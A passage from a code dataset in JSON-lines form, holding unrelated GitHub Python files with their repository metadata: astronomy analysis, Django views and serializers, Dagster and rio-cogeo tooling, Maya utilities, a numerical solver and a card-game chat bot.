np.allclose(np.diff(edges_x)[:-1], np.diff(edges_x)[1:]):\n warnings.warn(\"x edges are not equally spaced\")\n flag = True\n if not np.allclose(np.diff(edges_y)[:-1], np.diff(edges_y)[1:]):\n warnings.warn(\"y edges are not equally spaced\")\n flag = True\n\n pm_per_bin_x = np.diff(edges_x)[0] * u.mas / u.yr\n pm_per_bin_y = np.diff(edges_y)[0] * u.mas / u.yr\n\n pm_scale = (width_x * pm_per_bin_x + width_y * pm_per_bin_y) / 2\n\n # eror estimate\n pm_scale_err = np.abs(width_x * pm_per_bin_x - width_y * pm_per_bin_y) / 2\n\n return pm_scale, pm_scale_err, flag\n\n\n# /def\n\n\n###############################################################################\n# Command Line\n###############################################################################\n\n\ndef make_parser(inheritable=False):\n \"\"\"Expose parser for ``main``.\n\n Parameters\n ----------\n inheritable: bool\n whether the parser can be inherited from (default False).\n if True, sets ``add_help=False`` and ``conflict_hander='resolve'``\n\n Returns\n -------\n parser: ArgumentParser\n\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"fit_pm_scale\",\n add_help=~inheritable,\n conflict_handler=\"resolve\" if ~inheritable else \"error\",\n )\n\n # parser.add_argument(\n # \"figure_dir\",\n # type=str,\n # default=\"figures\",\n # help=\"The data directory\",\n # )\n # parser.add_argument(\n # \"--output_dir\",\n # type=str,\n # default=\"../../data\",\n # help=\"The data directory\",\n # )\n # parser.add_argument(\n # \"--data_dir\",\n # type=str,\n # default=\"data\",\n # help=\"The input data directory\",\n # )\n\n return parser\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef main(\n args: Optional[list] = None, opts: Optional[argparse.Namespace] = None\n):\n \"\"\"Script Function.\n\n Parameters\n ----------\n args : list, optional\n an optional single argument that holds the sys.argv list,\n except for the script name (e.g., argv[1:])\n opts : Namespace, optional\n pre-constructed results of parsed args\n if not None, used ONLY if args is None\n\n \"\"\"\n # deal with arguments\n if opts is not None and args is None:\n pass\n else:\n if opts is not None:\n warnings.warn(\"Not using `opts` because `args` are given\")\n parser = make_parser()\n opts = parser.parse_args(args)\n\n # get options\n # data_dir: str = opts.data_dir # where the data is stored\n # result_dir = str(\n # pathlib.Path(data_dir).parent\n # ) # where to store the formatted output\n\n # ensure paths end in '/'\n # data_dir = data_dir if data_dir.endswith(\"/\") else data_dir + \"/\"\n # result_dir = result_dir if result_dir.endswith(\"/\") else result_dir + \"/\"\n\n # read pr\n # testingoperty summary table\n summary = read_summary_table(DATA + \"summary.txt\")\n summary[\"pmscale\"] = np.NaN * u.mas / u.yr\n summary[\"pmscale_e\"] = np.NaN * u.mas / u.yr\n\n # globular clusters\n files = os.listdir(DATA + 'gcts')\n files = [f for f in files if f.endswith(\".txt\")]\n\n for file in tqdm.tqdm(files):\n\n name = file[: -len(\".txt\")] # GC name\n\n gc = read_globular_cluster_table(DATA + 'gcts/' + file)\n\n # compute scale parameter\n width_x, width_y, cov, labels, edges = scale_values_2d(\n name, gc, threshold=0.8, sigma=4\n )\n pm_scale, pm_scale_err, flag = average_scale_value(\n width_x, width_y, *edges\n )\n if flag:\n warnings.warn(name + \" raised the previous warning\")\n\n if np.isnan(pm_scale):\n warnings.warn(name + \" has NaN pm scale\")\n\n # write to table\n summary.loc[name][\"pmscale\"] = np.round(pm_scale, 3)\n summary.loc[name][\"pmscale_e\"] = np.round(pm_scale_err, 3)\n\n # # /for\n\n # save whole summary table\n summary.write(\n DATA + \"summary.txt\",\n format=\"ascii.commented_header\",\n overwrite=True,\n )\n\n return\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n# if __name__ == \"__main__\":\n\n# print(\"Running fit_pm_scale script.\")\n\n# main(args=None, opts=None)\n\n# print(\"finished.\")\n\n# # /if\n\n\n###############################################################################\n# END\n","repo_name":"nstarman/jas1101_project","sub_path":"jas1101finalproject/scripts/get_globular_clusters/fit_pm_scale.py","file_name":"fit_pm_scale.py","file_ext":"py","file_size_in_byte":12835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18413518063","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.homeview, name='home'),\n url(r'^feeds/$', views.ArticleListView.as_view(), name='feeds'),\n url(r'^feeds/category/version/$', views.VersionListView.as_view(), name='versionlist'),\n url(r'^feeds/category/tech/$', views.TechListView.as_view(), name='Techlist'),\n url(r'^feeds/category/review/$', views.ReviewListView.as_view(), name='Reviewlist'),\n url(r'^feeds/category/music&entertainment/$', views.MusicListView.as_view(), name='Musiclist'),\n url(r'^feeds/category/lifestyle/$', views.LifestyleListView.as_view(), name='Lifestylelist'), \n url(r'^feeds/tags/(?P<tag>\\w+)$',views.tagpage ,name='tagepage'),\n url(r'^archive/$', views.ArchiveView.as_view(), name=\"archive\"),\n url(r'search/$', views.search,name = 'search'),\n url(r'^feeds/(?P<slug>\\S+)$', views.ArticleDetailView.as_view(), name='detail'),\n \n]","repo_name":"PACHAELPHILLIP/version","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4083853093","text":"import os\n\n#from dagster_aws.s3 import s3_resource\nfrom dagster_dbt import dbt_cli_resource\nfrom dagster_pyspark import pyspark_resource\n\nfrom dagster import ResourceDefinition\nfrom dagster.utils import file_relative_path\n\n#from .common_bucket_s3_pickle_io_manager import common_bucket_s3_pickle_io_manager\nfrom .duckdb_parquet_io_manager import duckdb_partitioned_parquet_io_manager\nfrom .hn_resource import hn_api_subsample_client, hn_api_client\nfrom .parquet_io_manager import (\n local_partitioned_parquet_io_manager,\n # s3_partitioned_parquet_io_manager,\n)\n#from .snowflake_io_manager import snowflake_io_manager\n\n#duck_db_path = file_relative_path(__file__, \"duckdb.local.duckdb\")\nDBT_PROJECT_DIR = file_relative_path(__file__, \"../../hacker_news_dbt\")\nDBT_PROFILES_DIR = DBT_PROJECT_DIR + \"/config\"\ndbt_local_resource = dbt_cli_resource.configured(\n # \"vars\": {\"duckdb_path\": duck_db_path}\n {\"profiles_dir\": DBT_PROFILES_DIR, \"project_dir\": DBT_PROJECT_DIR, \"target\": \"local\"}\n)\n#dbt_staging_resource = dbt_cli_resource.configured(\n# {\"profiles-dir\": DBT_PROFILES_DIR, \"project-dir\": DBT_PROJECT_DIR, \"target\": \"staging\"}\n#)\n#dbt_prod_resource = dbt_cli_resource.configured(\n# {\"profiles_dir\": DBT_PROFILES_DIR, \"project_dir\": DBT_PROJECT_DIR, \"target\": \"prod\"}\n#)\n\n\nconfigured_pyspark = pyspark_resource.configured(\n {\n \"spark_conf\": {\n \"spark.jars.packages\": \",\".join(\n [\n #\"net.snowflake:snowflake-jdbc:3.8.0\",\n #\"net.snowflake:spark-snowflake_2.12:2.8.2-spark_3.0\",\n #\"com.amazonaws:aws-java-sdk:1.7.4,org.apache.hadoop:hadoop-aws:2.7.7\",\n ]\n ),\n #\"spark.hadoop.fs.s3.impl\": \"org.apache.hadoop.fs.s3native.NativeS3FileSystem\",\n #\"spark.hadoop.fs.s3.awsAccessKeyId\": os.getenv(\"AWS_ACCESS_KEY_ID\", \"\"),\n #\"spark.hadoop.fs.s3.awsSecretAccessKey\": os.getenv(\"AWS_SECRET_ACCESS_KEY\", \"\"),\n #\"spark.hadoop.fs.s3.buffer.dir\": \"/tmp\",\n }\n }\n)\n\n\n# snowflake_io_manager_prod = snowflake_io_manager.configured({\"database\": \"DEMO_DB_ASSETS\"})\n\n# RESOURCES_PROD = {\n# \"s3_bucket\": ResourceDefinition.hardcoded_resource(\"hackernews-elementl-prod\"),\n# \"io_manager\": common_bucket_s3_pickle_io_manager,\n# \"s3\": s3_resource,\n# \"parquet_io_manager\": s3_partitioned_parquet_io_manager,\n# \"warehouse_io_manager\": snowflake_io_manager_prod,\n# \"pyspark\": configured_pyspark,\n# \"warehouse_loader\": snowflake_io_manager_prod,\n# \"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n# \"dbt\": dbt_prod_resource,\n# }\n\n# snowflake_io_manager_staging = snowflake_io_manager.configured(\n# {\"database\": \"DEMO_DB_ASSETS_STAGING\"}\n# )\n\n\n# RESOURCES_STAGING = {\n# \"s3_bucket\": ResourceDefinition.hardcoded_resource(\"hackernews-elementl-dev\"),\n# \"io_manager\": common_bucket_s3_pickle_io_manager,\n# \"s3\": s3_resource,\n# \"parquet_io_manager\": s3_partitioned_parquet_io_manager,\n# \"warehouse_io_manager\": snowflake_io_manager_staging,\n# \"pyspark\": configured_pyspark,\n# \"warehouse_loader\": snowflake_io_manager_staging,\n# \"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n# \"dbt\": dbt_staging_resource,\n# }\n\nRESOURCES_LOCAL = {\n \"parquet_io_manager\": local_partitioned_parquet_io_manager,\n #\"warehouse_io_manager\": duckdb_partitioned_parquet_io_manager.configured(\n # {\"duckdb_path\": duck_db_path}\n #),\n \"warehouse_io_manager\": duckdb_partitioned_parquet_io_manager.configured(\n {\"duckdb_path\": os.path.join(DBT_PROJECT_DIR, \"hackernews.duckdb\")},\n ),\n \"pyspark\": configured_pyspark,\n #\": snowflake_io_manager_prod,\n #\"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n \"hn_client\": hn_api_client,\n \"dbt\": dbt_local_resource,\n}\n","repo_name":"geoHeil/dagster-asset-demo","sub_path":"hacker_news_assets/hacker_news_assets/resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"5336317090","text":"#------------------------------------------------------------------- HEADER ---\n# Title: \n# Descr: \n#\n# Author: Ryan Porter\n# Date: 2013.08.13 \n# Version: 0.1\n#\n#------------------------------------------------------------------------------\n\n#------------------------------------------------------------------ IMPORTS ---\n# Built-in\nimport os.path\n\n# Third Part\nimport maya.cmds as cmds\nimport maya.mel as mel\n\n#---------------------------------------------------------------- FUNCTIONS ---\n\ndef serializeCurves(nurbs_curves):\n ''' \n Return an list of MEL setAttr commands that will create the shape defined\n by 'nurbs_curves' when executed. Each command has a '%s' string formatting\n token that must be formatted with the name of the shape object when run.\n \n ARGUMENTS:\n nurbs_curves - [list] of nurbsCurves Maya objects\n \n RETURNS: [list] of MEL commands\n '''\n \n if not isinstance(nurbs_curves, list):\n raise TypeError(\"nurbs_curves must be a list of nurbsCurve objects\")\n \n for crv in nurbs_curves:\n if not cmds.objectType(crv, isType=\"nurbsCurve\"):\n raise TypeError(\"nurbs_curves must be a list of nurbsCurve objects\")\n \n result = []\n \n for crv in nurbs_curves:\n result.append(serializeCurve(crv))\n \n return result\n\ndef serializeCurve(crv):\n '''\n Return a MEL setAttr command that will create the shape defined by 'crv'\n when executed. This command has a '%s' string formatting token that must be\n formatted with the name of the shape object when run.\n \n ARGUMENTS:\n crv - [str] a nurbsCurve Maya object\n \n RETURNS: [str] a MEL command\n '''\n \n if not cmds.objectType(crv, isType=\"nurbsCurve\"):\n raise TypeError(\"crv must be a nurbsCurve object\")\n \n cmd = []\n \n crv_info = cmds.createNode('curveInfo', ss=True)\n cmds.connectAttr(\"%s.worldSpace\" % crv, \"%s.inputCurve\" % crv_info)\n knots = cmds.getAttr(\"%s.knots\" % crv_info)[0]\n num_knots = len(knots)\n cmds.delete(crv_info)\n \n degree = cmds.getAttr(\"%s.degree\" % crv)\n spans = cmds.getAttr(\"%s.spans\" % crv)\n form = cmds.getAttr(\"%s.form\" % crv)\n \n num_cvs = degree + spans\n cvs = []\n \n for i in range(num_cvs):\n cv = cmds.xform(\"%s.cv[%s]\" % (crv, i), q=True, os=True, t=True)\n \n cvs.append(cv)\n \n cmd.append('setAttr \"%s.cc\" - type \"nurbsCurve\"')\n cmd.append('%s %s %s no 3' % (degree, spans, form))\n cmd.append('%s' % num_knots)\n \n for k in knots:\n cmd.append('%s' % int(k))\n \n cmd.append('%s' % num_cvs)\n \n for cv in cvs:\n for c in cv:\n cmd.append(str(c)) \n \n return ' '.join(cmd)","repo_name":"MagSec-Arts/maya_tools","sub_path":"curvetool/curve_utils.py","file_name":"curve_utils.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37431764354","text":"# Ejercicio tomado del libro de Burden, Análisis numérico apartado 10.2, ejercicio 3 inciso c\r\n\r\nfrom math import cos, sin, pi, exp, sqrt\r\nimport numpy as np\r\n\r\n# introducir valores que se evualaran de la funcion\r\ndef Fs(x1, x2, x3):\r\n f1 = 3*x1-cos(x2*x3)-1/2\r\n f2 = x1**2-81*(x2+0.1)**2+sin(x3)+1.06\r\n f3 = exp(-x1*x2)+20*x3+(10*pi-3)/3\r\n return np.matrix([[f1], [f2], [f3]])\r\n\r\n#Matriz Jacobiana\r\ndef JInv(x1, x2, x3):\r\n J = np.matrix([[3, x3*sin(x2*x3), x2*sin(x2*x3)], [2*x1, -162*(x2+0.1), cos(x3)], [-x2*exp(-x1*x2), -x1*exp(-x1*x2), 20]])\r\n JV = np.linalg.inv(J)\r\n return [J, JV]\r\n\r\ndef RhapsonMulti(x1, x2, x3, P0, k, tolerancia):\r\n print(\"k \\t x1 \\t \\t x2 \\t \\t x3 \\t \\t (x(k)-x(k-1)\")\r\n print(\"{0:1d} \\t {1:1.4f} \\t {2:1.4f} \\t {3:1.4f} \\t\".format(k, x1, x2, x3))\r\n\r\n while k < 10:\r\n # Calcular vector F y matriz Jacobiana\r\n J, JI = JInv(x1, x2, x3)\r\n F = Fs(x1, x2, x3)\r\n Y = -JI * F\r\n # Vector x\r\n X = np.matrix(P0).T + Y\r\n\r\n # Actualizando valores\r\n x1, x2, x3 = float(X[0][0]), float(X[1][0]), float(X[2][0])\r\n\r\n # Calculo de la magnitud del vector\r\n magnitud = sqrt((x1 - P0[0]) ** 2 + (x2 - P0[1]) ** 2 + (x3 - P0[2]) ** 2)\r\n\r\n # Redifinir P0\r\n P0 = [x1, x2, x3]\r\n k += 1\r\n print(\"{0:1d} \\t {1:1.6f} \\t {2:1.6f} \\t {3:1.6f} \\t {4:1.6f}\".format(k, x1, x2, x3, magnitud))\r\n\r\n # Calcular magnitud del vector \"Y\" y aplicar la tolerancia\r\n if sqrt(Y[0][0] ** 2 + Y[1][0] ** 2 + Y[2][0] ** 2) < Tolerancia:\r\n print(\"Cálculo exitoso:)\")\r\n break\r\n\r\n\r\n#Aproximacion lineal\r\nP0 = [0.1, 0.1, -0.1]\r\n\r\n# Valores de aproximacion por separado\r\nx1, x2, x3 = P0\r\n\r\n# valor de k\r\nk= 0\r\n\r\nTolerancia = 0.0000000001\r\n\r\n# Llamada de la funcion con sus respectivos parametros\r\nRhapsonMulti(x1, x2, x3, P0, k, Tolerancia)","repo_name":"ZahidGSJ/Metodos-numericos-Python","sub_path":"Python/Ecuaciones no lineales/RhapsonMultiVariable.py","file_name":"RhapsonMultiVariable.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7621975313","text":"\nfrom rest_framework import serializers\n\n# Models\nfrom apps.products.models import Product, ProductImage\nfrom apps.reviews.models import Review\n\n# Product Image Serializer\nfrom .ProductImageSerializer import ProductImageSerializer\n\n# Utilities\nfrom apps.reviews.utils import calculate_avg_rating\n\n# Product Serializer\nclass ProductSerializer(serializers.ModelSerializer):\n # Product Images\n product_images = serializers.SerializerMethodField()\n\n # Number of reviews\n review_ratings = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n\n # Fieldnames\n fields = [\n \"id\",\n \"title\",\n \"description\",\n \"quantity\",\n \"price\",\n \"review_ratings\",\n \"product_images\"\n ]\n # Retrieves all review ratings with the associated product\n # Args:\n # self: class\n # product: Product\n # Return\n # Review rating object that contains the number of reviews and the average rating\n def get_review_ratings(self, product):\n # Query set for reviews associated with the product\n queryset = Review.objects.filter(product=product.id)\n\n # Calculates the average rating\n avg_rating = calculate_avg_rating(queryset)\n\n return {\"total_reviews\":len(queryset), \"avg_rating\": avg_rating}\n\n\n def get_product_images(self, product):\n # Query set for product images\n queryset = ProductImage.objects.filter(product=product.id)\n\n # Product images\n product_images = [ProductImageSerializer(product_image).data for product_image in queryset]\n\n return product_images","repo_name":"EgorUshakovOfficial/ecommerce-project","sub_path":"server/project/apps/products/serializers/ProductSerializer.py","file_name":"ProductSerializer.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14907560368","text":"import json\n\nimport nonebot\nfrom nonebot.params import CommandArg\n\nfrom nonebot.permission import SUPERUSER\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.onebot.v11 import Event, Bot, GroupMessageEvent, PrivateMessageEvent, GROUP_ADMIN, \\\n GROUP_OWNER\nfrom nonebot import on_command\n\nfrom nonebot_plugin_ocgbot_v2.libraries.Card import getCard, getRandomCard\nfrom nonebot_plugin_ocgbot_v2.libraries.searchManage import SearchManager\nfrom nonebot_plugin_ocgbot_v2.libraries.sendAction import *\nfrom nonebot_plugin_ocgbot_v2.libraries.randomManage import RandomManager\n\npm = RandomManager()\nsm = SearchManager()\n\n\n# ==========工具变量、方法=============================\n\n\ndef verifySid(sid: str):\n try:\n sType, sId = sid.split('_')\n if sType in ['group', 'user']:\n if sId.isdigit():\n return True\n return False\n except:\n return False\n\n\n# ===============功能==================================================\n\n\nsearch_card = on_command(\"查卡\", aliases={\"ck\", \"CK\"})\n\n\n@search_card.handle()\nasync def _(bot: Bot, event: Event, state: T_State, args: Message = CommandArg()):\n if isinstance(event, PrivateMessageEvent):\n sessionId = 'user_' + str(event.user_id)\n if isinstance(event, GroupMessageEvent):\n sessionId = 'group_' + str(event.group_id)\n regex = \"(.+) ([0-9]+)?\"\n text = str(args).strip()\n if text == \"\":\n await search_card.finish(\"请输入需要查询的卡名\")\n match = re.match(regex, text)\n try:\n search_group = match.groups()\n if search_group[1] is None:\n raise Exception()\n except:\n text = text + \" 1\"\n search_group = re.match(regex, text).groups()\n try:\n state['name'] = search_group[0]\n state['page'] = search_group[1]\n js = getCard(state['name'], state['page'])\n except Exception as e:\n await search_card.finish(\"咿呀?查询失败了呢\")\n if int(search_group[1]) > int(js.pageNum):\n await search_card.finish(\"页码超出最大值\" + \"`\" + str(js.pageNum) + \"`\")\n state['js'] = js\n if js.amount == 0:\n await sendNosearch(search_card)\n elif isinstance(event, PrivateMessageEvent):\n await send2(js, search_card)\n elif isinstance(event, GroupMessageEvent):\n typee = sm.CheckType(sessionId)\n state['send_type'] = typee\n if typee == 1:\n await send2(js, search_card)\n elif typee == 2:\n await send(js, bot, event, search_card)\n else:\n await send3(js, search_card)\n\n\n@search_card.got(\"text\", prompt=\"欧尼酱~输入任意语句或选择任意卡牌结束本次查卡~\")\nasync def _(bot: Bot, event: Event, state: T_State):\n text = str(state['text'])\n js = state['js']\n if text.isdigit():\n if isinstance(event, PrivateMessageEvent):\n typee = 1\n elif isinstance(event, GroupMessageEvent):\n typee = int(state['send_type'])\n len = int(js.amount)\n chose = int(text)\n if 1 <= chose <= len:\n if typee == 1:\n await send2(js, search_card, chose)\n elif typee == 2:\n await send(js, bot, event, search_card, chose)\n else:\n await send3(js, search_card, chose)\n else:\n name = state['name']\n page = int(state['page'])\n flag = None\n if text == \"下一页\":\n if page == js.pageNum:\n await search_card.reject(\"欧尼酱~已经到最后一页了~\")\n else:\n page = page + 1\n state['page'] = page\n flag = 1\n elif text == \"上一页\":\n if page == 1:\n await search_card.reject(\"欧尼酱~已经是第一页了~\")\n else:\n page = page - 1\n state['page'] = page\n flag = 1\n else:\n await search_card.finish()\n if flag is not None:\n js = getCard(name, str(page))\n state['js'] = js\n if js.amount == 0:\n await sendNosearch(search_card)\n elif isinstance(event, PrivateMessageEvent):\n await send2(js, search_card)\n elif isinstance(event, GroupMessageEvent):\n typee = state['send_type']\n if typee == 1:\n await send2(js, search_card)\n elif typee == 2:\n await send(js, bot, event, search_card)\n else:\n await send3(js, search_card)\n await search_card.reject(\"\")\n\n\nrandomCard = on_command('随机一卡', aliases={'抽一张卡'})\n\n\n@randomCard.handle()\nasync def _(bot: Bot, event: Event, state: T_State):\n groupSession = None\n sessionId = None\n if isinstance(event, PrivateMessageEvent):\n sessionId = 'user_' + str(event.user_id)\n userType = 'private'\n if isinstance(event, GroupMessageEvent):\n groupSession = 'group_' + str(event.group_id)\n sessionId = 'user_' + str(event.sender.user_id)\n userType = 'group'\n try:\n userType = 'SU' if (str(event.user_id) in nonebot.get_driver().config.superusers) else userType\n pm.CheckPermission(sessionId, groupSession, userType)\n except PermissionError as e:\n await randomCard.finish(str(e))\n try:\n js = getRandomCard()\n pm.UpdateLastSend(sessionId)\n except Exception as e:\n await randomCard.finish(\"咿呀?卡组被送进异次元了呢~\")\n await send3(js, randomCard)\n\n\n# ==========各类开关=============================\n\n# ----- 抽卡cd时间更新 -----\nrandom_cd = on_command(\"抽卡cd\", permission=GROUP_ADMIN | GROUP_OWNER | SUPERUSER, block=True, priority=10)\n\n\n# 获取参数\n@random_cd.handle()\nasync def cmdArg(bot: Bot, event: Event, state: T_State, arg: Message = CommandArg()):\n message = str(arg).replace(\" \", \"\")\n try:\n state['cdTime'] = int(str(message))\n except:\n await random_cd.finish(f'无效参数: {message}, 请输入 正整数 或 0 为参数')\n\n\n# 群聊部分自动获取sid\n@random_cd.handle()\nasync def group(bot: Bot, event: GroupMessageEvent, state: T_State):\n sid = 'group_' + str(event.group_id)\n if not verifySid(sid):\n await random_cd.reject(f\"无效目标对象: {sid}\")\n await random_cd.finish(pm.UpdateCd(sid, state['cdTime']))\n\n\n# 抽卡开关\nckpem = on_command(\"抽卡功能\", permission=GROUP_ADMIN | GROUP_OWNER | SUPERUSER)\n\n\n@ckpem.handle()\nasync def cmdArg(bot: Bot, event: Event, state: T_State, message: Message = CommandArg()):\n if 'off' in str(message):\n state['add_mode'] = True\n elif 'on' in str(message):\n state['add_mode'] = False\n else:\n await ckpem.finish(f'无效参数: {message}, 请输入 on 或 off 为参数')\n\n\n# 群聊部分自动获取sid\n@ckpem.handle()\nasync def group(bot: Bot, event: GroupMessageEvent, state: T_State):\n state['sid'] = 'group_' + str(event.group_id)\n sid = str(state['sid'])\n if not verifySid(sid):\n await ckpem.reject(f\"无效目标对象: {sid}\")\n await ckpem.finish(pm.UpdateBanList(sid, state['add_mode']))\n\n\n# 查卡方式\nsearchType = on_command(\"查卡方式\")\n\n\n@searchType.handle()\nasync def seartype(bot: Bot, event: GroupMessageEvent, state: T_State, args: Message = CommandArg()):\n message = str(args)\n state['sid'] = 'group_' + str(event.group_id)\n sid = str(state['sid'])\n if message.isdigit():\n if not verifySid(sid):\n await searchType.reject(f\"无效目标对象: {sid}\")\n await searchType.finish(sm.UpdateSearchType(sid, int(message)))\n else:\n await searchType.finish(\"请选择正确的方式\")\n","repo_name":"fireinsect/nonebot-plugin-ocgbot-v2","sub_path":"nonebot_plugin_ocgbot_v2/ocg.py","file_name":"ocg.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"28485496859","text":"\"\"\"Rio_cogeo.scripts.cli.\"\"\"\n\nimport os\n\nimport click\nimport numpy\n\nfrom rasterio.rio import options\nfrom rasterio.enums import Resampling\n\nfrom rio_cogeo.cogeo import cog_translate, cog_validate\nfrom rio_cogeo.profiles import cog_profiles\n\n\nclass BdxParamType(click.ParamType):\n \"\"\"Band inddex type.\"\"\"\n\n name = \"bidx\"\n\n def convert(self, value, param, ctx):\n \"\"\"Validate and parse band index.\"\"\"\n try:\n bands = [int(x) for x in value.split(\",\")]\n assert all(b > 0 for b in bands)\n return bands\n\n except (ValueError, AttributeError, AssertionError):\n raise click.ClickException(\n \"bidx must be a string of comma-separated integers (> 0), \"\n \"representing the band indexes.\"\n )\n\n\nclass NodataParamType(click.ParamType):\n \"\"\"Nodata inddex type.\"\"\"\n\n name = \"nodata\"\n\n def convert(self, value, param, ctx):\n \"\"\"Validate and parse band index.\"\"\"\n try:\n if value.lower() == \"nan\":\n return numpy.nan\n elif value.lower() in [\"nil\", \"none\", \"nada\"]:\n return None\n else:\n return float(value)\n except (TypeError, ValueError):\n raise click.ClickException(\"{} is not a valid nodata value.\".format(value))\n\n\n@click.group(short_help=\"Create and Validate COGEO\")\ndef cogeo():\n \"\"\"Rasterio cogeo subcommands.\"\"\"\n pass\n\n\n@cogeo.command(short_help=\"Create COGEO\")\n@options.file_in_arg\n@options.file_out_arg\n@click.option(\"--bidx\", \"-b\", type=BdxParamType(), help=\"Band indexes to copy.\")\n@click.option(\n \"--cog-profile\",\n \"-p\",\n \"cogeo_profile\",\n type=click.Choice(cog_profiles.keys()),\n default=\"deflate\",\n help=\"CloudOptimized GeoTIFF profile (default: deflate).\",\n)\n@click.option(\n \"--nodata\",\n type=NodataParamType(),\n metavar=\"NUMBER|nan\",\n help=\"Set nodata masking values for input dataset.\",\n)\n@click.option(\n \"--add-mask\",\n is_flag=True,\n help=\"Force output dataset creation with an internal mask (convert alpha band or nodata to mask).\",\n)\n@click.option(\n \"--overview-level\",\n type=int,\n help=\"Overview level (if not provided, appropriate overview level will be selected until the smallest overview is smaller than the internal block size).\",\n)\n@click.option(\n \"--overview-resampling\",\n help=\"Resampling algorithm.\",\n type=click.Choice(\n [it.name for it in Resampling if it.value in [0, 1, 2, 3, 4, 5, 6, 7]]\n ),\n default=\"nearest\",\n)\n@click.option(\n \"--overview-blocksize\",\n default=lambda: os.environ.get(\"GDAL_TIFF_OVR_BLOCKSIZE\", 128),\n help=\"Overview's internal tile size (default defined by GDAL_TIFF_OVR_BLOCKSIZE env or 128)\",\n)\n@click.option(\"--threads\", type=int, default=8)\n@options.creation_options\n@click.option(\n \"--quiet\",\n \"-q\",\n help=\"Suppress progress bar and other non-error output.\",\n is_flag=True,\n)\ndef create(\n input,\n output,\n bidx,\n cogeo_profile,\n nodata,\n add_mask,\n overview_level,\n overview_resampling,\n overview_blocksize,\n threads,\n creation_options,\n quiet,\n):\n \"\"\"Create Cloud Optimized Geotiff.\"\"\"\n output_profile = cog_profiles.get(cogeo_profile)\n output_profile.update(dict(BIGTIFF=os.environ.get(\"BIGTIFF\", \"IF_SAFER\")))\n if creation_options:\n output_profile.update(creation_options)\n\n config = dict(\n NUM_THREADS=threads,\n GDAL_TIFF_INTERNAL_MASK=os.environ.get(\"GDAL_TIFF_INTERNAL_MASK\", True),\n GDAL_TIFF_OVR_BLOCKSIZE=str(overview_blocksize),\n )\n\n cog_translate(\n input,\n output,\n output_profile,\n bidx,\n nodata,\n add_mask,\n overview_level,\n overview_resampling,\n config,\n quiet,\n )\n\n\n@cogeo.command(short_help=\"Validate COGEO\")\n@options.file_in_arg\ndef validate(input):\n \"\"\"Validate Cloud Optimized Geotiff.\"\"\"\n if cog_validate(input):\n click.echo(\"{} is a valid cloud optimized GeoTIFF\".format(input))\n else:\n click.echo(\"{} is NOT a valid cloud optimized GeoTIFF\".format(input))\n","repo_name":"ryanjdillon/rio-cogeo","sub_path":"rio_cogeo/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"14557795807","text":"from typing import Optional, Iterable\nimport yaml\n\ntry: # Assume we're a submodule in a package.\n import classes as cs\nexcept ImportError: # Apparently no higher-level package has been imported, fall back to a local import.\n from . import classes as cs\n\n\nDEFAULT_RULES = {\n 'max_header_level': 2,\n}\nSPACE = ' '\nINDENT_STEP = 4\nMARKERS = ('*', '-', '+', '>', '&', 'i', '=')\nSKIP_MARKERS = ('0', 'x')\nNAME_DIVIDERS = (':', ' - ')\nMAX_WORDS_IN_NAME = 5\n\n\ndef split_lines(text):\n iterable_text = [text] if isinstance(text, str) else text\n for line in iterable_text:\n for subline in line.split('\\n'):\n if subline != '':\n yield subline\n\n\ndef str_has_indent(text):\n if len(text) > INDENT_STEP:\n if text.startswith(SPACE * INDENT_STEP):\n return True\n return False\n\n\ndef transliterate(text):\n symbols = (u\"абвгдеёжзийклмнопрстуфхцчшщъыьэюяАБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\",\n u\"abvgdeejzijklmnoprstufhzcss_y_euaABVGDEEJZIJKLMNOPRSTUFHZCSS_Y_EUA\")\n tr = {ord(a): ord(b) for a, b in zip(*symbols)}\n return text.translate(tr)\n\n\nclass Paragraph(object):\n def __init__(\n self,\n text,\n level=0,\n adjust_level=True,\n ):\n self.text = text\n self.level = level\n if adjust_level:\n self.adjust_level()\n\n def get_line(self):\n return SPACE * INDENT_STEP * self.level + self.text\n\n def set_line(self, text):\n self.text = str(text)\n self.adjust_level()\n\n def has_indent(self):\n return str_has_indent(self.text)\n\n def adjust_level(self):\n while str_has_indent(self.text):\n self.level += 1\n self.text = self.text[INDENT_STEP:]\n\n def get_mark(self, standard_only=True):\n if len(self.text) > 2:\n if self.text[1] == SPACE:\n marker = self.text[0]\n if marker in MARKERS or marker in SKIP_MARKERS or not standard_only:\n return marker\n\n def get_text_without_marks(self):\n if self.get_mark():\n return self.text[2:]\n else:\n return self.text\n\n def get_markdown(self, rules=DEFAULT_RULES):\n max_header_level = rules.get('max_header_level')\n if self.level + 1 <= max_header_level:\n markdown_line = '#' * (self.level + 1) + ' ' + self.get_text_without_marks()\n else:\n markdown_line = SPACE * (self.level - max_header_level) * INDENT_STEP + self.text\n return [markdown_line]\n\n def get_tag(self):\n text 